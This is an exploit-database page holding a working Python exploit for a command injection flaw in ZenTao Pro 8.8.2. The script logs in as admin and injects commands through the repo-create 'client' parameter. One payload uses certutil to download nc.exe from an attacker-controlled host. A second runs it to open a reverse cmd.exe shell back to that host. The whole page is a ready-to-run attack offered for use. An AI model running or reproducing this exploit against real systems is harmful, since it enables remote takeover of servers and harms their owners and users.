ZenTao Pro 8.8.2 Command Injection

2020.07.03
Credit: Daniel Monzon
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: ZenTao Pro 8.8.2 - Command Injection # Date: 2020-07-01 # Exploit Author: Daniel Monzón & Melvin Boers # Vendor Homepage: https://www.zentao.pm/ # Version: 8.8.2 # Tested on: Windows 10 / WampServer # Other versions like pro or enterprise edition could be affected aswell # Netcat is needed to use this exploit import requests import hashlib import urllib.parse host = 'http://192.168.223.132' username = 'admin' password = 'Test123!@#' name = 'Test2' command = 'certutil.exe+-urlcache+-f+-split+http%3A%2F%2F192.168.223.131%2Fnc.exe+C%3A%5Cbad.exe+%26%26' command2 = 'C:\\bad.exe 192.168.223.131 9001 -e cmd.exe &&' git_path = 'C%3A%5CProgramData' x = requests.session() # Create a session, as needed because we need admin rights. def sign_in(url, username, password): password = hashlib.md5(password.encode('utf-8')).hexdigest() # We need to md5 encode the password in order to sign in proxy = {'http':'127.0.0.1:8080', 'https':'127.0.0.1:8080'} # Just for debugging phase credentials = {'account' : username, 'password' : password} # The credentials we need path = url + '/zentao/user-login.html' # URL + path x.post(path, data=credentials, proxies=proxy, verify=False) # Send the post request to sign in return '[*] We are signed in!' def go_to_repo(url): path = url + '/zentao/repo-browse.html' x.get(path, verify=False) print('[*] Getting to repo path') def create_repo(url, name, command): headers = {'Accept':'application/json, text/javascript, */*; q=0.01', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With': 'XMLHttpRequest', 'Origin':'http://192.168.223.132', 'Referer':'http://192.168.223.132/pro/repo-create.html', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0', 'Accept-Language':'en-US,en;q=0.5'} cookies = {'ajax_lastNext':'on', 'windowWidth':'1846', 'windowHeight':'790'} path = url + '/zentao/repo-create.html' parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False) print('[*] Creating the repo') def get_shell(url, name, command): headers = {'Accept':'application/json, text/javascript, */*; q=0.01', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With': 'XMLHttpRequest', 'Origin':'http://192.168.223.132', 'Referer':'http://192.168.223.132/pro/repo-create.html', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0', 'Accept-Language':'en-US,en;q=0.5'} cookies = {'ajax_lastNext':'on', 'windowWidth':'1846', 'windowHeight':'790'} path = url + '/zentao/repo-create.html' parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command2 x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False) print('[*] Check your netcat listener!') def main(): switch = True if switch: sign_in(host, username, password) if switch: go_to_repo(host) if switch: create_repo(host, name, command) if switch: get_shell(host, name, command2) switch = False if __name__ == "__main__": main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top